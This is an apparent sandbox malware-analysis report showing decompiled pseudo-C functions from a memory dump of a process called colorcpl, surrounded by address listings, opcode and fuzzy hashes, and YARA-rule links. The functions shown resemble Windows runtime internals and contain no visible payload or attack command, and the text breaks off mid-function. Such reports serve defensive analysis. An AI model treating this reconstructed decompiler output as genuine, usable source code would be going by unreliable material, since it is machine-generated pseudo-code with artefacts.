                                                                                                0x06e85cee
                                                                                                0x00000000
                                                                                                0x06e85cee
                                                                                                0x06e85cb1
                                                                                                0x06e85cb4
                                                                                                0x06e85cb9
                                                                                                0x06e85cbb
                                                                                                0x00000000
                                                                                                0x06e85cbd
                                                                                                0x06e85cbd
                                                                                                0x00000000
                                                                                                0x06e85cbd
                                                                                                0x06e85cbb
                                                                                                0x06e42ab1
                                                                                                0x06e42ab1
                                                                                                0x06e42ac4
                                                                                                0x06e42ac6
                                                                                                0x06e42ac6
                                                                                                0x00000000
                                                                                                0x06e42ac6
                                                                                                0x06e42aab
                                                                                                0x00000000
                                                                                                0x06e42a00
                                                                                                0x06e42a09
                                                                                                0x06e42a0e
                                                                                                0x06e42a21
                                                                                                0x06e42a24
                                                                                                0x06e42a35
                                                                                                0x06e42a3a
                                                                                                0x06e42a3d
                                                                                                0x06e42a42
                                                                                                0x06e42a59
                                                                                                0x06e42a59
                                                                                                0x06e42a5c
                                                                                                0x06e42a5f
                                                                                                0x06e42a5f
                                                                                                0x06e429fa
                                                                                                0x06e429f3
                                                                                                0x06e42a64
                                                                                                0x06e42a64
                                                                                                0x06e42a6b
                                                                                                0x06e42a6b
                                                                                                0x06e42a6d
                                                                                                0x06e42a72
                                                                                                0x06e42a72
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PATH
                                                                                                • API String ID: 0-1036084923
                                                                                                • Opcode ID: 9e72a90174ce533e6e4b1727bec8abbf7fe34f9ace9449132acdfc0e0dad3ec3
                                                                                                • Instruction ID: e0200fdc7b5962a39e2a81cf1532b83318a365cf1c7b696fc6dc362f200a7fc4
                                                                                                • Opcode Fuzzy Hash: 9e72a90174ce533e6e4b1727bec8abbf7fe34f9ace9449132acdfc0e0dad3ec3
                                                                                                • Instruction Fuzzy Hash: F2C1B275D10319EFDB94EFA9E880AEDB7B5FF48740F045069F615AB290D734AA01CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E12D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 63%
                                                                                                			E06E12D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x6f05350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x6f07bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E06E597C0();
				}
				if( *0x6f079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x6f079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E06E41624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E06E37D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E06EAFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E06E59520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E06E4E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L06E6DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x6f06901;
								_push(_t109);
								_v52 = _t98;
								if( *0x6f06901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E06E59980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E06E595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E06E37D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E06E37D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E06E97016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E06EAFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x6f05350;
							if(_t109 != 0x6f05350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E06EAFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E06EA5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                0x06e12d8a
                                                                                                0x06e12d8a
                                                                                                0x06e12d92
                                                                                                0x06e12d96
                                                                                                0x06e12d9e
                                                                                                0x06e12da0
                                                                                                0x06e12da3
                                                                                                0x06e12da5
                                                                                                0x06e12da8
                                                                                                0x06e12dab
                                                                                                0x06e12db2
                                                                                                0x06e6f9aa
                                                                                                0x06e6f9ab
                                                                                                0x06e6f9ae
                                                                                                0x06e6f9ae
                                                                                                0x06e12db8
                                                                                                0x06e12dc2
                                                                                                0x06e6f9b9
                                                                                                0x06e6f9be
                                                                                                0x06e6f9bf
                                                                                                0x06e6f9bf
                                                                                                0x06e12dcf
                                                                                                0x06e6f9c9
                                                                                                0x06e12dd5
                                                                                                0x06e12dd5
                                                                                                0x06e12dd5
                                                                                                0x06e12dde
                                                                                                0x06e12de1
                                                                                                0x06e12e70
                                                                                                0x06e12e72
                                                                                                0x06e12e72
                                                                                                0x06e12de7
                                                                                                0x06e12deb
                                                                                                0x06e12e7c
                                                                                                0x06e12e83
                                                                                                0x06e12e85
                                                                                                0x06e12e8b
                                                                                                0x06e12e8d
                                                                                                0x06e12e92
                                                                                                0x06e12e92
                                                                                                0x06e12e85
                                                                                                0x06e12df1
                                                                                                0x06e12df7
                                                                                                0x06e12df9
                                                                                                0x06e12df9
                                                                                                0x06e12dfc
                                                                                                0x06e12dff
                                                                                                0x06e12e02
                                                                                                0x00000000
                                                                                                0x06e12e05
                                                                                                0x06e12e0c
                                                                                                0x06e6f9d9
                                                                                                0x06e12e12
                                                                                                0x06e12e12
                                                                                                0x06e12e12
                                                                                                0x06e12e1a
                                                                                                0x06e6f9e3
                                                                                                0x06e6f9e9
                                                                                                0x06e6f9f0
                                                                                                0x06e6f9f6
                                                                                                0x06e6f9f8
                                                                                                0x06e6f9f8
                                                                                                0x06e6f9f0
                                                                                                0x06e12e23
                                                                                                0x06e6fa02
                                                                                                0x06e6fa03
                                                                                                0x06e6fa05
                                                                                                0x06e6fa06
                                                                                                0x00000000
                                                                                                0x06e12e29
                                                                                                0x06e12e29
                                                                                                0x06e12e2e
                                                                                                0x06e12e34
                                                                                                0x06e12e3e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e12e44
                                                                                                0x06e12e47
                                                                                                0x06e12e4d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e12e4f
                                                                                                0x06e12e54
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e12e5a
                                                                                                0x06e12e5f
                                                                                                0x06e12e9a
                                                                                                0x06e12ea4
                                                                                                0x06e12ea5
                                                                                                0x06e12ea8
                                                                                                0x06e12eaf
                                                                                                0x06e12eb2
                                                                                                0x06e12eb5
                                                                                                0x06e6fae9
                                                                                                0x06e6faeb
                                                                                                0x06e6faed
                                                                                                0x06e6faef
                                                                                                0x06e6faf7
                                                                                                0x06e6faf8
                                                                                                0x06e6fafd
                                                                                                0x06e6faff
                                                                                                0x06e6fb04
                                                                                                0x06e6fb04
                                                                                                0x06e6faff
                                                                                                0x06e12ec0
                                                                                                0x06e12ec4
                                                                                                0x06e12ec6
                                                                                                0x06e12ec8
                                                                                                0x06e6fb14
                                                                                                0x06e6fb18
                                                                                                0x06e6fb1e
                                                                                                0x06e6fb21
                                                                                                0x06e6fb21
                                                                                                0x06e12ece
                                                                                                0x06e12ece
                                                                                                0x06e12ece
                                                                                                0x06e12ed7
                                                                                                0x06e12e61
                                                                                                0x06e12e63
                                                                                                0x06e6fa6b
                                                                                                0x06e6fa71
                                                                                                0x06e6fa76
                                                                                                0x06e6fa78
                                                                                                0x06e6fa8a
                                                                                                0x06e6fa7a
                                                                                                0x06e6fa83
                                                                                                0x06e6fa83
                                                                                                0x06e6fa8f
                                                                                                0x06e6fa91
                                                                                                0x06e6fa97
                                                                                                0x06e6fa9d
                                                                                                0x06e6faa4
                                                                                                0x06e6faaa
                                                                                                0x06e6faaf
                                                                                                0x06e6fab1
                                                                                                0x06e6fac3
                                                                                                0x06e6fab3
                                                                                                0x06e6fabc
                                                                                                0x06e6fabc
                                                                                                0x06e6fac8
                                                                                                0x06e6facb
                                                                                                0x06e6fadf
                                                                                                0x06e6fadf
                                                                                                0x06e6facb
                                                                                                0x06e6faa4
                                                                                                0x06e6fa91
                                                                                                0x06e12e6f
                                                                                                0x06e12e6f
                                                                                                0x06e12e5f
                                                                                                0x06e6fa13
                                                                                                0x06e6fa15
                                                                                                0x06e6fa17
                                                                                                0x06e6fa1f
                                                                                                0x06e6fa21
                                                                                                0x06e6fa22
                                                                                                0x06e6fa25
                                                                                                0x06e6fa28
                                                                                                0x06e6fa2f
                                                                                                0x06e6fa2f
                                                                                                0x06e6fa2a
                                                                                                0x06e6fa2a
                                                                                                0x06e6fa2a
                                                                                                0x06e6fa31
                                                                                                0x06e6fa34
                                                                                                0x06e6fa36
                                                                                                0x06e6fa3c
                                                                                                0x06e6fa3e
                                                                                                0x06e6fa41
                                                                                                0x06e6fa43
                                                                                                0x06e6fa45
                                                                                                0x06e6fa45
                                                                                                0x06e6fa41
                                                                                                0x06e6fa3c
                                                                                                0x06e6fa4a
                                                                                                0x06e6fa4f
                                                                                                0x06e6fa51
                                                                                                0x06e6fa53
                                                                                                0x06e6fa56
                                                                                                0x06e6fa5b
                                                                                                0x06e6fa5e
                                                                                                0x00000000
                                                                                                0x06e6fa5e
                                                                                                0x06e12e23

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RTL: Re-Waiting
                                                                                                • API String ID: 0-316354757
                                                                                                • Opcode ID: d6fd7a6121530570baffe520c99861be83ae7185b67db7145d9cc06630d3a664
                                                                                                • Instruction ID: 86a92a9a1257944af583f02514e6fd322a7998278eb3c7ba72bfa8307cd86c9c
                                                                                                • Opcode Fuzzy Hash: d6fd7a6121530570baffe520c99861be83ae7185b67db7145d9cc06630d3a664
                                                                                                • Instruction Fuzzy Hash: 1D613730E407449FEBA2DF79DC44BBE77A6EF44368F142669E5219B2C0C7309A81DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E06EE0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E06EDFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E06EE1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E06E59730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E06EDA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E06EDA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x6f08b04 >> 0x14) + (_v44 -  *0x6f08b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E06E37D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E06ED138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E06E37D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E06ECFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x6f08724 & 0x00000008) != 0) {
						E06ED52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E06EE15B5(0x6f08ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                0x06ee0eb7
                                                                                                0x06ee0eb9
                                                                                                0x06ee0ec0
                                                                                                0x06ee0ec2
                                                                                                0x06ee0ecd
                                                                                                0x06ee105b
                                                                                                0x06ee105b
                                                                                                0x06ee1061
                                                                                                0x06ee1066
                                                                                                0x06ee1066
                                                                                                0x06ee106b
                                                                                                0x06ee1073
                                                                                                0x06ee1073
                                                                                                0x06ee0ed3
                                                                                                0x06ee0ed6
                                                                                                0x06ee0edc
                                                                                                0x06ee0ee0
                                                                                                0x06ee0ee7
                                                                                                0x06ee0ef0
                                                                                                0x06ee0ef5
                                                                                                0x06ee0efa
                                                                                                0x06ee0efc
                                                                                                0x06ee0efd
                                                                                                0x06ee0f03
                                                                                                0x06ee0f04
                                                                                                0x06ee0f06
                                                                                                0x06ee0f07
                                                                                                0x06ee0f09
                                                                                                0x06ee0f0e
                                                                                                0x06ee0f14
                                                                                                0x06ee0f23
                                                                                                0x06ee0f2d
                                                                                                0x06ee0f34
                                                                                                0x06ee0f34
                                                                                                0x06ee0f14
                                                                                                0x06ee0f52
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee0f58
                                                                                                0x06ee0f73
                                                                                                0x06ee0f74
                                                                                                0x06ee0f79
                                                                                                0x06ee0f7d
                                                                                                0x06ee0f80
                                                                                                0x06ee0f86
                                                                                                0x06ee0fab
                                                                                                0x06ee0fb5
                                                                                                0x06ee0fc6
                                                                                                0x06ee0fd1
                                                                                                0x06ee0fe3
                                                                                                0x06ee0fd3
                                                                                                0x06ee0fdc
                                                                                                0x06ee0fdc
                                                                                                0x06ee0feb
                                                                                                0x06ee1009
                                                                                                0x06ee1009
                                                                                                0x06ee1015
                                                                                                0x06ee1027
                                                                                                0x06ee1017
                                                                                                0x06ee1020
                                                                                                0x06ee1020
                                                                                                0x06ee102f
                                                                                                0x06ee103c
                                                                                                0x06ee103c
                                                                                                0x06ee1048
                                                                                                0x06ee1050
                                                                                                0x06ee1050
                                                                                                0x06ee1055
                                                                                                0x00000000
                                                                                                0x06ee1055
                                                                                                0x06ee0f88
                                                                                                0x06ee0f9e
                                                                                                0x06ee0fa2
                                                                                                0x06ee0fa9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ee0fa9
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `
                                                                                                • API String ID: 0-2679148245
                                                                                                • Opcode ID: f928ba100506c38d4fcdae071a6213109ae9b3798b90d2c600c5d55dc0dd93e0
                                                                                                • Instruction ID: 2f2926f6ffe0763e474522e8821bd5a5d2bad8167835d3c7718602f25269dc32
                                                                                                • Opcode Fuzzy Hash: f928ba100506c38d4fcdae071a6213109ae9b3798b90d2c600c5d55dc0dd93e0
                                                                                                • Instruction Fuzzy Hash: CC51FE702043819FD7A4DF28D884B5BB7E9FBC4314F14192CF9A287290E774E856CB66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E06E4F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E06E34120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E06E59830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E06E59990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E06E595D0();
							goto L11;
						} else {
							_t109 = L06E34620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E06E5F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E06E595D0();
										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                0x06e4f0d3
                                                                                                0x06e4f0d9
                                                                                                0x06e4f0e0
                                                                                                0x06e4f0e7
                                                                                                0x06e4f0f2
                                                                                                0x06e4f0f4
                                                                                                0x06e4f0f8
                                                                                                0x06e4f100
                                                                                                0x06e4f108
                                                                                                0x06e4f10d
                                                                                                0x06e4f115
                                                                                                0x06e4f116
                                                                                                0x06e4f11f
                                                                                                0x06e4f123
                                                                                                0x06e4f124
                                                                                                0x06e4f12c
                                                                                                0x06e4f130
                                                                                                0x06e4f134
                                                                                                0x06e4f13d
                                                                                                0x06e4f144
                                                                                                0x06e4f14b
                                                                                                0x06e4f152
                                                                                                0x06e8bab0
                                                                                                0x06e8bab0
                                                                                                0x06e4f158
                                                                                                0x06e4f158
                                                                                                0x06e4f15a
                                                                                                0x06e4f160
                                                                                                0x06e4f165
                                                                                                0x06e4f166
                                                                                                0x06e4f16f
                                                                                                0x06e4f173
                                                                                                0x06e8baa7
                                                                                                0x06e8baa7
                                                                                                0x06e8baab
                                                                                                0x00000000
                                                                                                0x06e4f179
                                                                                                0x06e4f18d
                                                                                                0x06e4f191
                                                                                                0x06e8baa2
                                                                                                0x00000000
                                                                                                0x06e4f197
                                                                                                0x06e4f19b
                                                                                                0x06e4f1a2
                                                                                                0x06e4f1a9
                                                                                                0x06e4f1af
                                                                                                0x06e4f1b2
                                                                                                0x06e4f1b6
                                                                                                0x06e4f1b9
                                                                                                0x06e4f1c4
                                                                                                0x06e4f1d8
                                                                                                0x06e4f1df
                                                                                                0x06e4f1e3
                                                                                                0x06e4f1eb
                                                                                                0x06e4f1ee
                                                                                                0x06e4f1f4
                                                                                                0x06e4f20f
                                                                                                0x06e8bab7
                                                                                                0x06e8babb
                                                                                                0x06e8bacc
                                                                                                0x06e8bad1
                                                                                                0x06e4f215
                                                                                                0x06e4f218
                                                                                                0x06e4f226
                                                                                                0x06e4f22b
                                                                                                0x00000000
                                                                                                0x06e4f22b
                                                                                                0x06e4f1f6
                                                                                                0x06e4f1f6
                                                                                                0x06e4f1f9
                                                                                                0x06e4f1fb
                                                                                                0x06e4f1fb
                                                                                                0x06e4f1f4
                                                                                                0x06e4f191
                                                                                                0x06e4f173
                                                                                                0x06e4f152
                                                                                                0x06e4f203

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                • Instruction ID: 4a5b25aba52a814c2d6470b9dc57d52a4c33be9bbdd08c8b68671b92392c7eb7
                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                • Instruction Fuzzy Hash: AD518F715047109FD360DF29C840A6BBBF8FF88B10F00992DF9A597690E7B4E914CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E93540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E06E93540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x6f0d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E06E50BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E06E93706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E06E5FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E06E93540;
						E06E5FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E06E6DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E06EA0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E06E597C0();
					}
					return E06E5B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
